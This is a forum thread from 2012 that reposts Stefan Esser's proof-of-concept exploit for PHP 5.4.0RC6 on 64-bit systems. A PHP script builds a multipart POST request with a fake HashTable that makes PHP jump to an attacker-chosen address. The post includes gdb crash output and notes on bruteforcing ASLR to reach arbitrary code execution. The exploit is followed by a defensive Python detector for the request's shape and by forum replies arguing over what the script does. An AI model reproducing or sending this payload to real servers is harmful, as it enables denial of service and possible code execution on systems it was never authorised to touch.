The_Arhitect Posted February 5, 2012

PHP 5.4.0RC6 64bit Denial of Service

```php
<?php
/*
  This script generates a POST header that makes PHP 5.4.0RC6 *64 bit*
  try to execute code at 0x1111111111111111

  (C) Copyright 2012 Stefan Esser

  PHP 5.3.9 requires you to know the address of a writable address filled with NULL.
  32bit requires you to create a fake 32bit Hashtable instead of a 64bit one

  Because this vulnerability also allows leaking memory addresses, ASLR can be "semi"-defeated.
  This means around 4000 tries = 4000 requests = 4000 crashes are enough to bruteforce
  code addresses to execute arbitrary code despite ASLR/NX

  better exploit might be possible after deeper research + heap massage

  This specific attack only works if there is no Suhosin-Patch -> RHEL, CentOS

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007fd959ca5f9d in _zend_hash_index_update_or_next_insert (ht=0x7fd96480d508, h=0, pData=0x7fff75c47bd0, nDataSize=8, pDest=0x7fff75c47bc8, flag=1, __zend_filename=0x7fd95a061b68 "/home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.h", __zend_lineno=350) at /home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.c:398
398         ht->pDestructor(p->pData);
(gdb) i r
rax            0x7fd9583352a0       140571464389280
rbx            0x0                  0
rcx            0x8                  8
rdx            0x111111111111111    76861433640456465
rsi            0x7fd95a077b08       140571495070472
rdi            0x7fd9583352a0       140571464389280
rbp            0x7fff75c47ae0       0x7fff75c47ae0
rsp            0x7fff75c47a80       0x7fff75c47a80
r8             0x7fff75c47bc8       140735169199048
r9             0x1                  1
r10            0x6238396661373430   7077469926293189680
r11            0x7fd962f4c8e0       140571644840160
r12            0x7fd966b91da8       140571708038568
r13            0x0                  0
r14            0xffffffff00000001   -4294967295
r15            0x7fd964b10538       140571673953592
rip            0x7fd959ca5f9d       0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>
eflags         0x10206              [ PF IF RF ]
cs             0x33                 51
ss             0x2b                 43
ds             0x0                  0
es             0x0                  0
fs             0x0                  0
gs             0x0                  0
(gdb) x/5i $rip
=> 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>:  callq  *%rdx
   0x7fd959ca5f9f <_zend_hash_index_update_or_next_insert+479>:  cmpl   $0x8,-0x3c(%rbp)
   0x7fd959ca5fa3 <_zend_hash_index_update_or_next_insert+483>:  jne    0x7fd959ca6031 <_zend_hash_index_update_or_next_insert+625>
   0x7fd959ca5fa9 <_zend_hash_index_update_or_next_insert+489>:  mov    -0x18(%rbp),%rax
   0x7fd959ca5fad <_zend_hash_index_update_or_next_insert+493>:  mov    0x10(%rax),%rax
(gdb)
*/

$boundary = md5(microtime());
$varname = "xxx";

$payload = "";

// first part: the variable "xxx" with a 128-byte binary value (the fake 64-bit HashTable mentioned above)
$payload .= "--$boundary\n";
$payload .= 'Content-Disposition: form-data; name="'.$varname.'"'."\n\n";
$payload .= chr(16);
for ($i=1; $i<7*8; $i++) {
    $payload .= chr(0);
}
for ($i=1; $i<8; $i++) {
    $payload .= "\x11";
}
$payload .= chr(1);
for ($i=16+48+1; $i<128; $i++) {
    $payload .= chr(0);
}
$payload .= "\n";

// 1000 filler variables
for ($i=0; $i<1000; $i++) {
    $payload .= "--$boundary\n";
    $payload .= 'Content-Disposition: form-data; name="aaa'.$i.'"'."\n\n";
    $payload .= "aaa\n";
}

// the same variable name again, this time with array syntax
$payload .= "--$boundary\n";
$payload .= 'Content-Disposition: form-data; name="'.$varname.'[]"'."\n\n";
$payload .= "aaa\n";
$payload .= "--$boundary\n";
$payload .= 'Content-Disposition: form-data; name="'.$varname.'[0]"'."\n\n";
$payload .= "aaa\n";
$payload .= "--$boundary--\n";

echo "POST /index.php HTTP/1.0\n";
echo "Content-Type: multipart/form-data; boundary=$boundary\n";
echo "Content-Length: ", strlen($payload), "\n";
echo "\n";
echo "$payload";
?>
```

Source: PHP 5.4.0RC6 64bit Denial of Service
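From a defender's side, the request the script above emits has a recognisable shape: one form variable is sent as a scalar carrying a binary (NUL-bearing) value, a thousand filler parts follow, and then the same variable name is re-sent as an array element (`xxx[]`, `xxx[0]`). The following Python is an added example, not part of the original post or of Stefan Esser's script: a small multipart/form-data parser plus a heuristic that flags that shape in a request body. The boundary, field names, the 500-part threshold and the sample bodies are all constructed assumptions, not a vendor signature.

```python
import re

NAME_RE = re.compile(r'name="([^"]*)"')

def parse_multipart(body: bytes, boundary: str):
    """Return (name, value) pairs from a multipart/form-data body.
    Accepts bare LF as well as CRLF, since the posted script emits LF."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):               # "--boundary--" closes the body
            break
        m = re.search(rb"\r?\n\r?\n", chunk)      # blank line ends the part headers
        if not m:
            continue
        hdr = chunk[:m.start()].decode("latin-1")
        nm = NAME_RE.search(hdr)
        if nm:
            parts.append((nm.group(1), chunk[m.end():].rstrip(b"\r\n")))
    return parts

def is_array_name(name: str) -> bool:
    return "[" in name and name.endswith("]")

def suspicious(body: bytes, boundary: str, max_parts: int = 500):
    """Heuristic (an assumption, not a vendor signature): list the reasons a body
    matches the shape of the posted payload. An empty list means nothing was flagged."""
    parts = parse_multipart(body, boundary)
    reasons = set()
    if len(parts) > max_parts:
        reasons.add(f"part count {len(parts)} exceeds {max_parts}")
    scalars = {n: v for n, v in parts if not is_array_name(n)}
    for n, _ in parts:
        base = n.split("[", 1)[0]
        if is_array_name(n) and base in scalars:
            reasons.add(f"'{base}' sent as a scalar and again as array element '{n}'")
    for n, v in scalars.items():
        if b"\x00" in v:                          # NUL bytes are not form text
            reasons.add(f"'{n}' carries a {len(v)}-byte binary value")
    return sorted(reasons)

def build_body(boundary: str, fields) -> bytes:
    """Constructed sample input only: assemble a multipart body from (name, value) pairs."""
    out = b""
    for n, v in fields:
        out += f'--{boundary}\nContent-Disposition: form-data; name="{n}"\n\n'.encode() + v + b"\n"
    return out + f"--{boundary}--\n".encode()

B = "deadbeef"  # constructed boundary
BENIGN = build_body(B, [("user", b"alice"), ("tags[]", b"a"), ("tags[]", b"b")])
SHAPED = build_body(B, [("xxx", b"\x00" * 64)] + [(f"aaa{i}", b"aaa") for i in range(1000)]
                       + [("xxx[]", b"aaa"), ("xxx[0]", b"aaa")])
```

`suspicious(BENIGN, B)` returns an empty list, while `suspicious(SHAPED, B)` returns four reasons: the part count, the binary scalar, and the two array re-registrations of `xxx`.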
crisit2008 Posted February 8, 2012

And... what does it do? Can you explain it for beginners too?
backdoor Posted February 8, 2012

The_Arhitect, don't be upset that I'm telling you, but lots of people know how to copy-paste. First and foremost, if you look more closely, your file is a PHP script... Which does what? Local DoS? HAHAHA... YOU CAN DO THAT with a while(); too. If I'm wrong, enlighten me! Please!
The_Arhitect (Author) Posted February 9, 2012 (edited)

> The_Arhitect, don't be upset that I'm telling you, but lots of people know how to copy-paste. First and foremost, if you look more closely, your file is a PHP script... Which does what? Local DoS? HAHAHA... YOU CAN DO THAT with a while(); too. If I'm wrong, enlighten me! Please!

Others will show up along the way.

Edited February 12, 2012 by The_Arhitect
backdoor Posted February 11, 2012

The_Arhitect, I think you're starting to like me but don't know how to tell me. Your personality is probably very strong....

Nytro, I know it's not the same thing. A script like this means you have at least FTP access to the server. And in the end, what good does it do you to keep knocking that guy's server down? You won't hurt it much anyway, because mod_php hasn't been used for some time. Plus the admin can see which process is killing his server and will wipe your application. Honestly, Mr. Architect, I don't see what it would be good for.
Nytro Posted February 12, 2012

I don't know if you noticed, but what gets generated there is an HTTP request, which is meant to be sent to a server. OK, Denial of Service, meaning receiving a few thousand requests is nothing, since you have 3 trillion processors, yes, that's not a problem, but it's more than that.

"try to execute code at 0x1111111111111111"

for ($i=1; $i<8; $i++) { $payload .= "\x11"; }

Doesn't that tell you anything?
backdoor Posted February 15, 2012

Yes, Nytro, you're right. It may be a super cool exploit. Now I have a question of my own: which OS has PHP 5.4.0RC6?????????????? I'd really like to test it!